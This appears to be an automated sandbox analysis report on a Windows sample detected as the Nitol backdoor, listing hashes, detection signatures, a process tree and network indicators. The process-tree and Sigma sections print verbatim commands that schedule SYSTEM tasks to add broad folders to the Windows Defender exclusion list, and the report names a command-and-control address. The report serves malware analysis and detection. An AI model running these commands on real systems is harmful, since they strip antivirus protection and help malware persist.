Edit tour

Windows Analysis Report
1387457-38765948.15.exe

Overview

General Information

Sample name:	1387457-38765948.15.exe
Analysis ID:	1589380
MD5:	947cd5df10d540b879c037c1cb519e63
SHA1:	8e4f326d08b675c077dc1d19246bac5eaa0f73dc
SHA256:	29f92fd013bdfc23e6b1a088f68b7bf4acf423bcc440d0ff49ac0079a38c5072
Tags:	backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Nitol

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Detected unpacking (creates a PE file in dynamic memory)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Nitol

AI detected suspicious sample

Adds extensions / path to Windows Defender exclusion list (Registry)

Creates an undocumented autostart registry key

Drops PE files to the document folder of the user

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for dropped file

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

PE file contains section with special chars

Sample is not signed and drops a device driver

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses cmd line tools excessively to alter registry or file data

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to delete services

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Creates files inside the driver directory

Creates files inside the system directory

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE

Sigma detected: Windows Defender Exclusions Added - Registry

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

1387457-38765948.15.exe (PID: 6504 cmdline: "C:\Users\user\Desktop\1387457-38765948.15.exe" MD5: 947CD5DF10D540B879C037C1CB519E63)

cajXRH.exe (PID: 1456 cmdline: C:\Users\user\Documents\cajXRH.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)

cajXRH.exe (PID: 7108 cmdline: C:\Users\user\Documents\cajXRH.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)

cmd.exe (PID: 6864 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 3412 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5700 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7100 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 5596 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 5000 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 396 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4348 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 3796 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 5500 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2136 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6848 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 2336 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 1284 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3176 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 916 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

4fkch1.exe (PID: 2492 cmdline: "C:\Program Files (x86)\4fkch1\4fkch1.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

cmd.exe (PID: 4948 cmdline: cmd /c echo.>c:\xxxx.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3940 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 1004 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 3636 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 2792 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 6328 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 3520 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 1820 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 2920 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

4fkch1.exe (PID: 2892 cmdline: "C:\Program Files (x86)\4fkch1\4fkch1.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

12xy9.exe (PID: 5604 cmdline: "C:\Program Files (x86)\G1f92m\12xy9.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

12xy9.exe (PID: 1892 cmdline: "C:\Program Files (x86)\G1f92m\12xy9.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

4fkch1.exe (PID: 5840 cmdline: "C:\Program Files (x86)\4fkch1\4fkch1.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

12xy9.exe (PID: 6508 cmdline: "C:\Program Files (x86)\G1f92m\12xy9.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

4fkch1.exe (PID: 1780 cmdline: "C:\Program Files (x86)\4fkch1\4fkch1.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Nitol		No Attribution	https://asec.ahnlab.com/en/44504/ https://blogs.technet.microsoft.com/microsoft_blog/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain/ https://en.wikipedia.org/wiki/Nitol_botnet https://krebsonsecurity.com/tag/nitol/	https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000027.00000002.3569495271.000000001002D000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
00000027.00000002.3568299396.00000000047D0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: 4fkch1.exe PID: 2492	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: 4fkch1.exe PID: 2492	PlugXStrings	PlugX Identifying Strings	Seth Hardy	0x2cb71:$Dwork: d:\work 0x4d34f:$Dwork: d:\work 0xb93ea:$Dwork: d:\work 0xf7a6b:$Shell6: Shell6 0xf884a:$Shell6: Shell6

Unpacked PEs

Source	Rule	Description	Author	Strings
39.2.4fkch1.exe.47d03e8.5.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
39.2.4fkch1.exe.47d03e8.5.raw.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
39.2.4fkch1.exe.10000000.8.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
39.2.4fkch1.exe.3670000.4.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x221dd:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x2225b:$e2: Add-MpPreference -ExclusionPath
4.2.cajXRH.exe.2910000.1.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fc20:$e2: Add-MpPreference -ExclusionPath

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\cajXRH.exe, ParentImage: C:\Users\user\Documents\cajXRH.exe, ParentProcessId: 7108, ParentProcessName: cajXRH.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 6864, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE

Source: Process started

Author: frack113: Data: Command: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3940, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ProcessId: 1004, ProcessName: reg.exe

Sigma detected: Windows Defender Exclusions Added - Registry

Source: Registry Key set

Author: Christian Burkard (Nextron Systems): Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 1004, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData

Suricata Signatures

ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-12T04:12:15.985589+0100	2852901	1	Malware Command and Control Activity Detected	192.168.2.4	50019	8.210.64.208	8917	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Program Files (x86)\4fkch1\tbcore3U.dll	Avira: detection malicious, Label: TR/Redcap.vdzex
Source: C:\Program Files (x86)\G1f92m\tbcore3U.dll	Avira: detection malicious, Label: TR/Redcap.vdzex

Multi AV Scanner detection for submitted file

Source: 1387457-38765948.15.exe

Virustotal: Detection: 8%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\4fkch1\tbcore3U.dll	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\G1f92m\tbcore3U.dll	Joe Sandbox ML: detected

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Unpacked PE file: 39.2.4fkch1.exe.5130000.6.unpack
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Unpacked PE file: 39.2.4fkch1.exe.5190000.7.unpack

Source: unknown	HTTPS traffic detected: 47.101.26.25:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.4:49865 version: TLS 1.2

Source:	Binary string: C:\BuildAgent\work\897482836e9bb448\_bin\Release\ps64ldr.pdb source: 1387457-38765948.15.exe
Source:	Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: 4fkch1.exe, 00000027.00000002.3565592607.0000000000F4E000.00000004.00000020.00020000.00000000.sdmp, 4fkch1.exe, 00000027.00000002.3565404898.0000000000598000.00000002.00000001.01000000.0000000A.sdmp, 4fkch1.exe, 00000027.00000000.2806122888.0000000000598000.00000002.00000001.01000000.0000000A.sdmp, 4fkch1.exe, 00000028.00000000.2828514970.0000000000598000.00000002.00000001.01000000.0000000A.sdmp, 4fkch1.exe, 00000028.00000002.2835065898.0000000000598000.00000002.00000001.01000000.0000000A.sdmp, 12xy9.exe, 00000029.00000002.2840313694.00000000008A8000.00000002.00000001.01000000.0000000C.sdmp, 12xy9.exe, 00000029.00000000.2833145012.00000000008A8000.00000002.00000001.01000000.0000000C.sdmp, 12xy9.exe, 0000002C.00000002.2856238979.00000000008A8000.00000002.00000001.01000000.0000000C.sdmp, 12xy9.exe, 0000002C.00000000.2844020447.00000000008A8000.00000002.00000001.01000000.0000000C.sdmp, 4fkch1.exe, 0000002D.00000002.2858016988.0000000000598000.00000002.00000001.01000000.0000000A.sdmp, 4fkch1.exe, 0000002D.00000000.2849028962.0000000000598000.00000002.00000001.01000000.0000000A.sdmp, 12xy9.exe, 0000002E.00000002.3329102867.00000000008A8000.00000002.00000001.01000000.0000000C.sdmp, 12xy9.exe, 0000002E.00000000.3323172379.00000000008A8000.00000002.00000001.01000000.0000000C.sdmp, 4fkch1.exe, 0000002F.00000002.3334645534.0000000000598000.00000002.00000001.01000000.0000000A.sdmp, 4fkch1.exe, 0000002F.00000000.3328740598.0000000000598000.00000002.00000001.01000000.0000000A.sdmp, 12xy9.exe.39.dr, 4fkch1.exe.5.dr
Source:	Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source:	Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 1387457-38765948.15.exe, 00000000.00000003.2232632197.00000000133CB000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.2193772333.00000000133CC000.00000004.00000020.00020000.00000000.sdmp, cajXRH.exe, 00000004.00000000.2323491028.0000000140014000.00000002.00000001.01000000.00000008.sdmp, cajXRH.exe, 00000004.00000002.2329689112.0000000140014000.00000002.00000001.01000000.00000008.sdmp, cajXRH.exe, 00000005.00000000.2341314704.0000000140014000.00000002.00000001.01000000.00000008.sdmp, cajXRH.exe.0.dr

Change of critical system settings

Adds extensions / path to Windows Defender exclusion list (Registry)

Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\ProgramData	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Program Files (x86)	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\user\Documents	Jump to behavior

Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\4fkch1\4fkch1.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Source: C:\Users\user\Documents\cajXRH.exe

Code function: 4_2_00007FFE1320A1B8 FindFirstFileExW,

4_2_00007FFE1320A1B8

Source: C:\Users\user\Documents\cajXRH.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Documents\cajXRH.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: C:\Users\user\Documents\cajXRH.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000DFFE
Source: C:\Users\user\Documents\cajXRH.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000DDFF
Source: C:\Users\user\Documents\cajXRH.exe	Code function: 4x nop then movsxd rbx, qword ptr [r14+10h]	4_2_0000000140011270
Source: C:\Users\user\Documents\cajXRH.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000DE96
Source: C:\Users\user\Documents\cajXRH.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000DEFB
Source: C:\Users\user\Documents\cajXRH.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000E178
Source: C:\Users\user\Documents\cajXRH.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000DDD9

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.4:50019 -> 8.210.64.208:8917

Source: global traffic

TCP traffic: 192.168.2.4:50019 -> 8.210.64.208:8917

Source: Joe Sandbox View

IP Address: 118.178.60.9 118.178.60.9

Source: Joe Sandbox View

ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
